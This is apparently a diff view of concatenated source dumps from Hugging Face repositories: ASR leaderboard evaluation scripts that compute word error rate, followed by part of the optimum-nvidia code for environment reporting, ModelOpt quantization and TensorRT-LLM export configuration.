+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.source, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
751
+ print('Results saved at path:', os.path.abspath(manifest_path))
752
+ wer_metric = evaluate.load('wer')
753
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
754
+ wer = round(100 * wer, 2)
755
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
756
+ print('WER:', wer, '%', 'RTFx:', rtfx)
757
+ if __name__ == '__main__':
758
+ parser = argparse.ArgumentParser()
759
+ parser.add_argument('--source', type=str, required=True, help='SpeechBrain model repository. E.g. `asr-crdnn-rnnlm-librispeech`')
760
+ parser.add_argument('--speechbrain_pretrained_class_name', type=str, required=True, help='SpeechBrain pretrained class name. E.g. `EncoderASR`')
761
+ parser.add_argument('--dataset_path', type=str, default='hf-audio/esb-datasets-test-only-sorted', help='Dataset path. By default, it is `esb/datasets`')
762
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
763
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation`' for the dev split, or `'test'` for the test split.")
764
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
765
+ parser.add_argument('--batch_size', type=int, default=16, help='Number of samples to go through each streamed batch.')
766
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
767
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
768
+ parser.add_argument('--warmup_steps', type=int, default=5, help='Number of warm-up steps to run before launching the timed runs.')
769
+ args = parser.parse_args()
770
+ parser.set_defaults(streaming=True)
771
+ main(args)
772
+
773
+ # File: open_asr_leaderboard-main/transformers/run_eval.py
774
+ import argparse
775
+ import os
776
+ import torch
777
+ from torch.nn.attention import sdpa_kernel, SDPBackend
778
+ from transformers import AutoConfig, AutoModelForSpeechSeq2Seq, AutoModelForCTC, AutoProcessor, MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING
779
+ import evaluate
780
+ from normalizer import data_utils
781
+ import time
782
+ from tqdm import tqdm
783
+ wer_metric = evaluate.load('wer')
784
+ torch.set_float32_matmul_precision('high')
785
+
786
+ def main(args):
787
+ config = AutoConfig.from_pretrained(args.model_id)
788
+ cls_model = AutoModelForSpeechSeq2Seq if type(config) in MODEL_FOR_SPEECH_SEQ_2_SEQ_MAPPING else AutoModelForCTC
789
+ model = cls_model.from_pretrained(args.model_id, torch_dtype=torch.bfloat16, attn_implementation='sdpa').to(args.device)
790
+ processor = AutoProcessor.from_pretrained(args.model_id)
791
+ model_input_name = processor.model_input_names[0]
792
+ if model.can_generate():
793
+ gen_kwargs = {'max_new_tokens': args.max_new_tokens}
794
+ if getattr(model.generation_config, 'is_multilingual'):
795
+ gen_kwargs['language'] = 'en'
796
+ gen_kwargs['task'] = 'transcribe'
797
+ elif args.max_new_tokens:
798
+ raise ValueError('`max_new_tokens` should only be set for auto-regressive models, but got a CTC model.')
799
+ if args.torch_compile:
800
+ model.forward = torch.compile(model.forward, mode=args.compile_mode, fullgraph=True)
801
+ if model.can_generate():
802
+ model.generation_config.cache_implementation = 'static'
803
+
804
+ def benchmark(batch, min_new_tokens=None):
805
+ audios = [audio['array'] for audio in batch['audio']]
806
+ minibatch_size = len(audios)
807
+ start_time = time.time()
808
+ padding_size = None
809
+ if minibatch_size != args.batch_size and args.torch_compile:
810
+ padding_size = args.batch_size - minibatch_size
811
+ padding_audios = [audios[-1] for _ in range(padding_size)]
812
+ audios.extend(padding_audios)
813
+ if not model.can_generate():
814
+ inputs = processor(audios, sampling_rate=16000, truncation=False, padding='longest', return_tensors='pt', return_attention_mask=True)
815
+ else:
816
+ inputs = processor(audios, sampling_rate=16000, return_tensors='pt', device=args.device)
817
+ inputs = inputs.to(args.device)
818
+ inputs[model_input_name] = inputs[model_input_name].to(torch.bfloat16)
819
+ with sdpa_kernel(SDPBackend.MATH if args.torch_compile else SDPBackend.FLASH_ATTENTION):
820
+ if model.can_generate():
821
+ pred_ids = model.generate(**inputs, **gen_kwargs, min_new_tokens=min_new_tokens)
822
+ else:
823
+ with torch.no_grad():
824
+ logits = model(**inputs).logits
825
+ pred_ids = logits.argmax(-1)
826
+ if padding_size is not None:
827
+ pred_ids = pred_ids[:-padding_size, ...]
828
+ pred_text = processor.batch_decode(pred_ids, skip_special_tokens=True)
829
+ runtime = time.time() - start_time
830
+ batch['transcription_time_s'] = minibatch_size * [runtime / minibatch_size]
831
+ batch['predictions'] = [data_utils.normalizer(pred) for pred in pred_text]
832
+ batch['references'] = batch['norm_text']
833
+ return batch
834
+ if args.warmup_steps is not None:
835
+ dataset = data_utils.load_data(args)
836
+ dataset = data_utils.prepare_data(dataset)
837
+ num_warmup_samples = args.warmup_steps * args.batch_size
838
+ if args.streaming:
839
+ warmup_dataset = dataset.take(num_warmup_samples)
840
+ else:
841
+ warmup_dataset = dataset.select(range(min(num_warmup_samples, len(dataset))))
842
+ warmup_dataset = iter(warmup_dataset.map(benchmark, batch_size=args.batch_size, batched=True, fn_kwargs={'min_new_tokens': args.max_new_tokens}))
843
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
844
+ continue
845
+ dataset = data_utils.load_data(args)
846
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
847
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
848
+ if args.streaming:
849
+ dataset = dataset.take(args.max_eval_samples)
850
+ else:
851
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
852
+ dataset = data_utils.prepare_data(dataset)
853
+ dataset = dataset.map(benchmark, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
854
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
855
+ result_iter = iter(dataset)
856
+ for result in tqdm(result_iter, desc='Samples...'):
857
+ for key in all_results:
858
+ all_results[key].append(result[key])
859
+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
860
+ print('Results saved at path:', os.path.abspath(manifest_path))
861
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
862
+ wer = round(100 * wer, 2)
863
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
864
+ print('WER:', wer, '%', 'RTFx:', rtfx)
865
+ if __name__ == '__main__':
866
+ parser = argparse.ArgumentParser()
867
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with 🤗 Transformers')
868
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
869
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
870
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation`' for the dev split, or `'test'` for the test split.")
871
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
872
+ parser.add_argument('--batch_size', type=int, default=16, help='Number of samples to go through each streamed batch.')
873
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
874
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
875
+ parser.add_argument('--max_new_tokens', type=int, default=None, help='Maximum number of tokens to generate (for auto-regressive models).')
876
+ parser.add_argument('--torch_compile', action='store_true', help='Whether to JIT compile the forward pass of the model.')
877
+ parser.add_argument('--compile_mode', type=str, default='max-autotune', help="Mode for torch compiling model forward pass. Can be either 'default', 'reduce-overhead', 'max-autotune' or 'max-autotune-no-cudagraphs'.")
878
+ parser.add_argument('--warmup_steps', type=int, default=10, help='Number of warm-up steps to run before launching the timed runs.')
879
+ args = parser.parse_args()
880
+ parser.set_defaults(streaming=False)
881
+ main(args)
882
+
huggingface_optimum-benchmark.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_optimum-nvidia.txt ADDED
@@ -0,0 +1,1270 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: optimum-nvidia-main/src/optimum/commands/env.py
2
+ import platform
3
+ import subprocess
4
+ import huggingface_hub
5
+ from tensorrt import __version__ as trt_version
6
+ from tensorrt_llm import __version__ as trtllm_version
7
+ from transformers import __version__ as transformers_version
8
+ from transformers.utils import is_torch_available
9
+ from optimum.commands import BaseOptimumCLICommand, CommandInfo
10
+ from optimum.version import __version__ as optimum_version
11
+
12
+ class EnvironmentCommand(BaseOptimumCLICommand):
13
+ COMMAND = CommandInfo(name='env', help='Get information about the environment used.')
14
+
15
+ @staticmethod
16
+ def print_apt_pkgs():
17
+ apt = subprocess.Popen(['apt', 'list', '--installed'], stdout=subprocess.PIPE)
18
+ grep = subprocess.Popen(['grep', 'cuda'], stdin=apt.stdout, stdout=subprocess.PIPE)
19
+ pkgs_list = list(grep.stdout)
20
+ for pkg in pkgs_list:
21
+ print(pkg.decode('utf-8').split('\n')[0])
22
+
23
+ def run(self):
24
+ pt_version = 'not installed'
25
+ if is_torch_available():
26
+ import torch
27
+ pt_version = torch.__version__
28
+ platform_info = {'Platform': platform.platform(), 'Python version': platform.python_version()}
29
+ info = {'`tensorrt` version': trt_version, '`tensorrt-llm` version': trtllm_version, '`optimum` version': optimum_version, '`transformers` version': transformers_version, '`huggingface_hub` version': huggingface_hub.__version__, '`torch` version': f'{pt_version}'}
30
+ print('\nCopy-and-paste the text below in your GitHub issue:\n')
31
+ print('\nPlatform:\n')
32
+ print(self.format_dict(platform_info))
33
+ print('\nPython packages:\n')
34
+ print(self.format_dict(info))
35
+ print('\nCUDA system packages:\n')
36
+ self.print_apt_pkgs()
37
+
38
+ # File: optimum-nvidia-main/src/optimum/nvidia/compression/modelopt.py
39
+ from abc import ABC, abstractmethod
40
+ from typing import TYPE_CHECKING, Iterable, Optional, Protocol, Union, runtime_checkable
41
+ import modelopt.torch.quantization as mtq
42
+ import modelopt.torch.sparsity as mts
43
+ import torch
44
+ from modelopt.torch.export import export_tensorrt_llm_checkpoint
45
+ from transformers.quantizers import HfQuantizer
46
+ from transformers.utils.quantization_config import QuantizationConfigMixin
47
+ from optimum.nvidia.compression import CompressionRecipe
48
+ if TYPE_CHECKING:
49
+ from modelopt.torch.quantization import QuantizeConfig
50
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
51
+ from optimum.nvidia.export import Workspace
52
+
53
+ @runtime_checkable
54
+ class IntoModelOptQuantizeConfig(Protocol):
55
+
56
+ def into_modelopt_qconfig(self) -> 'QuantizeConfig':
57
+ ...
58
+
59
+ class ModelOptConfig(QuantizationConfigMixin):
60
+
61
+ def __init__(self, qconfig: Union['QuantizeConfig', 'IntoModelOptQuantizeConfig'], sparsity: Optional[Union[mts.mode.SparseGPTConfig, mts.mode.SparseMagnitudeConfig]]=None):
62
+ self._qconfig = qconfig.into_modelopt_qconfig() if isinstance(qconfig, IntoModelOptQuantizeConfig) else qconfig
63
+ self._sparsity = sparsity
64
+
65
+ @property
66
+ def quant_method(self):
67
+ return self._qconfig.algorithm
68
+
69
+ @property
70
+ def qconfig(self) -> 'QuantizeConfig':
71
+ return self._qconfig
72
+
73
+ @property
74
+ def sparsity(self) -> Optional[str]:
75
+ return self._sparsity
76
+
77
+ class ModelOptRecipe(CompressionRecipe[ModelOptConfig], ABC):
78
+
79
+ @property
80
+ @abstractmethod
81
+ def config(self) -> ModelOptConfig:
82
+ raise NotImplementedError()
83
+
84
+ @property
85
+ @abstractmethod
86
+ def dataset(self) -> Iterable:
87
+ raise NotImplementedError()
88
+
89
+ class ModelOptQuantizer(HfQuantizer):
90
+
91
+ def __init__(self, recipe: ModelOptRecipe):
92
+ super().__init__(recipe.config)
93
+ self._recipe = recipe
94
+
95
+ def _looper(self, model: 'TransformersPreTrainedModel'):
96
+ for sample in self._recipe.dataset:
97
+ _ = model(**sample)
98
+
99
+ def _process_model_before_weight_loading(self, model, **kwargs):
100
+ return model
101
+
102
+ def _process_model_after_weight_loading(self, model, **kwargs):
103
+ if 'workspace' not in kwargs:
104
+ raise KeyError('workspace not provided but required to generate quantized model representation')
105
+ workspace: 'Workspace' = kwargs.pop('workspace')
106
+ with torch.inference_mode():
107
+ if (sconfig := self._recipe.config.sparsity):
108
+ device = model.device
109
+ model = mts.sparsify(model.cpu(), sconfig, {'data_loader': self._recipe.dataset, 'collect_func': lambda x: x})
110
+ model = mts.export(model)
111
+ model.to(device)
112
+ qmodel = mtq.quantize(model, vars(self._recipe.config.qconfig), forward_loop=self._looper)
113
+ export_tensorrt_llm_checkpoint(qmodel, decoder_type=model.config.model_type, dtype=model.dtype, export_dir=workspace.checkpoints_path, inference_tensor_parallel=1, inference_pipeline_parallel=1, use_nfs_workspace=False, naive_fp8_quantization=False)
114
+ return qmodel
115
+
116
+ @property
117
+ def is_serializable(self):
118
+ return True
119
+
120
+ @property
121
+ def is_trainable(self):
122
+ return True
123
+
124
+ # File: optimum-nvidia-main/src/optimum/nvidia/errors.py
125
+ from typing import Optional
126
+ from optimum.nvidia.utils.nvml import SM_FP8_SUPPORTED
127
+
128
+ class OptimumNvidiaException(Exception):
129
+
130
+ def __init__(self, msg: str, operation: Optional[str]=None):
131
+ if operation:
132
+ super().__init__(f'[{operation}] {msg}.')
133
+ else:
134
+ super().__init__(f'{msg}')
135
+
136
+ class UnsupportedModelException(OptimumNvidiaException):
137
+
138
+ def __init__(self, model_type: str):
139
+ super().__init__(f'Model of type {model_type} is not supported. Please open-up an issue at https://github.com/huggingface/optimum-nvidia/issues')
140
+
141
+ class UnsupportedHardwareFeature(OptimumNvidiaException):
142
+
143
+ def __init__(self, msg, feature: str):
144
+ super(msg)
145
+
146
+ @classmethod
147
+ def float8(cls) -> 'UnsupportedHardwareFeature':
148
+ return Float8NotSupported()
149
+
150
+ class Float8NotSupported(UnsupportedHardwareFeature):
151
+
152
+ def __init__(self):
153
+ super().__init__(f'float8 is not supported on your device. Please use a device with compute capabilities {SM_FP8_SUPPORTED}', 'float8')
154
+
155
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/cli.py
156
+ from typing import TYPE_CHECKING
157
+ if TYPE_CHECKING:
158
+ from argparse import ArgumentParser
159
+
160
+ def common_trtllm_export_args(parser: 'ArgumentParser'):
161
+ parser.add_argument('model', type=str, help='Model to export.')
162
+ required_group = parser.add_argument_group('Required arguments')
163
+ required_group.add_argument('--max-input-length', type=int, default=-1, help='Maximum sequence length, in number of tokens, the prompt can be. The maximum number of potential tokens generated will be <max-output-length> - <max-input-length>.')
164
+ required_group.add_argument('--max-output-length', type=int, default=-1, help='Maximum sequence length, in number of tokens, the model supports.')
165
+ optional_group = parser.add_argument_group('Optional arguments')
166
+ optional_group.add_argument('-d', '--dtype', type=str, default='auto', help="Computational data type used for the model. Default to 'auto' matching model's data type.")
167
+ optional_group.add_argument('--max-batch-size', type=int, default=1, help='Maximum number of concurrent requests the model can process. Default to 1.')
168
+ optional_group.add_argument('--max-beams-width', type=int, default=1, help='Maximum number of sampling paths ("beam") to evaluate when decoding new a token. Default to 1.')
169
+ optional_group.add_argument('-q', '--quantization', type=str, help='Path to a quantization recipe file.')
170
+ optional_group.add_argument('--destination', type=str, default=None, help='Folder where the resulting exported engines will be stored. Default to Hugging Face Hub cache.')
171
+ optional_group.add_argument('--push-to-hub', type=str, help='Repository to push generated engines to.')
172
+
173
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/config.py
174
+ from dataclasses import dataclass
175
+ from logging import getLogger
176
+ from os import PathLike
177
+ from typing import TYPE_CHECKING, Optional, Union
178
+ from warnings import warn
179
+ from tensorrt_llm import BuildConfig
180
+ from tensorrt_llm import Mapping as ShardingInfo
181
+ from tensorrt_llm.bindings import QuantMode
182
+ from tensorrt_llm.plugin import PluginConfig
183
+ from tensorrt_llm.plugin.plugin import ContextFMHAType
184
+ from transformers import AutoConfig
185
+ from optimum.nvidia.lang import DataType
186
+ from optimum.utils import NormalizedConfig
187
+ if TYPE_CHECKING:
188
+ from transformers import PretrainedConfig
189
+ INFER_NUM_LOCAL_GPUS = -1
190
+ LOGGER = getLogger()
191
+
192
+ @dataclass
193
+ class ExportConfig:
194
+ dtype: str
195
+ max_input_len: int
196
+ max_output_len: int
197
+ max_batch_size: int
198
+ max_beam_width: int = 1
199
+ max_num_tokens: int = -1
200
+ enabled_chunked_context: int = False
201
+ sharding: Optional[ShardingInfo] = None
202
+ optimization_level: int = 3
203
+
204
+ def __post_init__(self):
205
+ if self.max_batch_size < 1:
206
+ raise ValueError(f'max_batch_size should >= 1, got {self.max_batch_size}')
207
+
208
+ @staticmethod
209
+ def from_pretrained(model_id_or_path: Union[str, PathLike], max_batch_size: int=1) -> 'ExportConfig':
210
+ return ExportConfig.from_config(AutoConfig.from_pretrained(model_id_or_path), max_batch_size)
211
+
212
+ @staticmethod
213
+ def from_config(config: Union[NormalizedConfig, 'PretrainedConfig'], max_batch_size: int=1) -> 'ExportConfig':
214
+ if not isinstance(config, NormalizedConfig):
215
+ config = NormalizedConfig(config)
216
+ dtype = DataType.from_torch(config.torch_dtype).value
217
+ max_input_len = config.max_position_embeddings
218
+ max_output_len = config.max_position_embeddings
219
+ econfig = ExportConfig(dtype=dtype, max_input_len=max_input_len, max_output_len=max_output_len, max_batch_size=max_batch_size)
220
+ econfig.with_sharding()
221
+ econfig.validate()
222
+ return econfig
223
+
224
+ def validate(self) -> 'ExportConfig':
225
+ if self.optimization_level < 0:
226
+ raise ValueError(f'optimization_level should be >= 0, got {self.optimization_level}')
227
+ if self.max_num_tokens == -1:
228
+ if self.enabled_chunked_context:
229
+ self.max_num_tokens = 128
230
+ warn(f'max_num_tokens set to {self.max_num_tokens} with chunked context enabled might not be optimal.')
231
+ else:
232
+ self.max_num_tokens = 2 * self.max_input_len
233
+ LOGGER.debug(f'Inferred max_num_tokens={self.max_num_tokens}')
234
+ return self
235
+
236
+ @property
237
+ def plugin_config(self) -> 'PluginConfig':
238
+ config = PluginConfig()
239
+ config.gemm_plugin = 'auto'
240
+ config.gpt_attention_plugin = 'auto'
241
+ config.set_context_fmha(ContextFMHAType.enabled)
242
+ if self.sharding.world_size > 1:
243
+ config.lookup_plugin = 'auto'
244
+ config.set_nccl_plugin()
245
+ if DataType(self.dtype) == DataType.FLOAT8:
246
+ config.gemm_swiglu_plugin = True
247
+ return config
248
+
249
+ def to_builder_config(self, qmode: Optional['QuantMode']=None, plugin_config: Optional[PluginConfig]=None) -> 'BuildConfig':
250
+ self.validate()
251
+ plugin_config = plugin_config or self.plugin_config
252
+ if qmode:
253
+ plugin_config.use_fp8_context_fmha = qmode.has_fp8_qdq() or qmode.has_fp8_kv_cache()
254
+ if qmode.is_weight_only():
255
+ plugin_config.weight_only_groupwise_quant_matmul_plugin = 'auto'
256
+ weight_sparsity = False
257
+ else:
258
+ weight_sparsity = False
259
+ return BuildConfig(max_input_len=self.max_input_len, max_seq_len=self.max_output_len, max_batch_size=self.max_batch_size, max_beam_width=self.max_beam_width, max_num_tokens=self.max_num_tokens, builder_opt=self.optimization_level, plugin_config=plugin_config, use_fused_mlp=True, weight_sparsity=weight_sparsity)
260
+
261
+ def with_sharding(self, tp: int=1, pp: int=1, gpus_per_node: int=8, sharding: Optional[ShardingInfo]=None) -> 'ExportConfig':
262
+ self.sharding = sharding or ShardingInfo(tp_size=tp, pp_size=pp, world_size=tp * pp, gpus_per_node=gpus_per_node)
263
+ return self
264
+
265
+ def auto_parallel(config: 'ExportConfig', world_size: int=INFER_NUM_LOCAL_GPUS) -> 'ExportConfig':
266
+ if world_size < 1:
267
+ from optimum.nvidia.utils.nvml import get_device_count
268
+ world_size = get_device_count()
269
+ LOGGER.info(f'Found {world_size} GPUs on the system')
270
+ if world_size == 0:
271
+ raise ValueError('No GPU found')
272
+ elif world_size == 1:
273
+ return config.with_sharding(tp=1, pp=1, gpus_per_node=world_size)
274
+ else:
275
+ LOGGER.info(f'Creating auto-parallelization strategy on {world_size}-GPUs')
276
+ LOGGER.warning('Auto-parallelization strategy is currently in beta and might not be optimal')
277
+ if world_size == 2:
278
+ return config.with_sharding(tp=2, pp=1, gpus_per_node=world_size)
279
+ elif world_size == 4:
280
+ return config.with_sharding(tp=2, pp=2, gpus_per_node=world_size)
281
+ elif world_size == 8:
282
+ return config.with_sharding(tp=4, pp=2, gpus_per_node=world_size)
283
+ else:
284
+ raise ValueError(f'Unsupported number of GPUs: {world_size}. Please open-up and issue on the optimum-nvidia repository: https://github.com/huggingface/optimum-nvidia')
285
+
286
+ def sharded(config: 'ExportConfig', tp: int=1, pp: int=1) -> 'ExportConfig':
287
+ if tp < 1:
288
+ raise ValueError(f'Tensor Parallelism (tp) should be >= 1 (got: tp={tp})')
289
+ if pp < 1:
290
+ raise ValueError(f'Pipeline Parallelism (pp) should be >= 1 (got: pp={pp})')
291
+ return config.with_sharding(sharding=ShardingInfo(tp_size=tp, pp_size=pp, world_size=tp * pp))
292
+
293
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/converter.py
294
+ import shutil
295
+ from abc import ABC
296
+ from enum import Enum
297
+ from logging import getLogger
298
+ from os import PathLike
299
+ from pathlib import Path
300
+ from typing import TYPE_CHECKING, Optional, Sequence, Type, Union
301
+ from tensorrt_llm.builder import build
302
+ from optimum.nvidia.compression.modelopt import ModelOptQuantizer
303
+ from optimum.nvidia.export import Workspace
304
+ from optimum.nvidia.utils.nvml import get_device_name, is_post_ampere
305
+ if TYPE_CHECKING:
306
+ from tensorrt_llm import BuildConfig, Mapping
307
+ from tensorrt_llm.models import PretrainedModel
308
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
309
+ from optimum.nvidia.compression.modelopt import ModelOptRecipe
310
+ LOGGER = getLogger()
311
+
312
+ def infer_plugin_from_build_config(config: 'BuildConfig') -> 'BuildConfig':
313
+ if is_post_ampere():
314
+ LOGGER.debug('Enabling Paged Context FMHA plugin')
315
+ config.plugin_config.update_from_dict({'use_paged_context_fmha': True})
316
+ config.plugin_config.update_from_dict({'enable_xqa': False})
317
+ return config
318
+
319
+ class TensorRTArtifactKind(Enum):
320
+ CHECKPOINTS = 'checkpoints'
321
+ ENGINES = 'engines'
322
+
323
+ class TensorRTArtifact:
324
+
325
+ @staticmethod
326
+ def checkpoints(root: Union[str, PathLike]) -> 'TensorRTArtifact':
327
+ return TensorRTArtifact(TensorRTArtifactKind.CHECKPOINTS, root)
328
+
329
+ @staticmethod
330
+ def engines(root: Union[str, PathLike]) -> 'TensorRTArtifact':
331
+ return TensorRTArtifact(TensorRTArtifactKind.ENGINES, root)
332
+
333
+ def __init__(self, kind: TensorRTArtifactKind, root: Union[str, PathLike]):
334
+ self._kind = kind
335
+ self._root = root
336
+
337
+ @property
338
+ def kind(self) -> TensorRTArtifactKind:
339
+ return self._kind
340
+
341
+ @property
342
+ def root(self) -> Path:
343
+ return Path(self._root)
344
+
345
+ def push_to_hub(self):
346
+ raise NotImplementedError()
347
+
348
+ class TensorRTModelConverter(ABC):
349
+ CONFIG_CLASS: Type
350
+ MODEL_CLASS: Type
351
+
352
+ def __init__(self, model_id: str, subpart: str='', workspace: Optional[Union['Workspace', str, bytes, Path]]=None, license_path: Optional[Union[str, bytes, Path]]=None):
353
+ LOGGER.info(f'Creating a model converter for {subpart}')
354
+ if not workspace:
355
+ target_device = get_device_name(0)[-1]
356
+ workspace = Workspace.from_hub_cache(model_id, target_device, subpart=subpart)
357
+ if isinstance(workspace, (str, bytes, Path)):
358
+ workspace = Workspace(Path(workspace))
359
+ LOGGER.debug(f'Initializing model converter workspace at {workspace.root}')
360
+ self._workspace = workspace
361
+ self._license_path = license_path
362
+
363
+ @property
364
+ def workspace(self) -> Workspace:
365
+ return self._workspace
366
+
367
+ def save_license(self, licence_filename: str='LICENSE'):
368
+ if not (dst_licence_file_path := (self.workspace.root / licence_filename)).exists() and self._license_path:
369
+ shutil.copyfile(self._license_path, dst_licence_file_path)
370
+
371
+ def quantize(self, model: 'TransformersPreTrainedModel', qconfig: 'ModelOptRecipe') -> TensorRTArtifact:
372
+ quantizer = ModelOptQuantizer(qconfig)
373
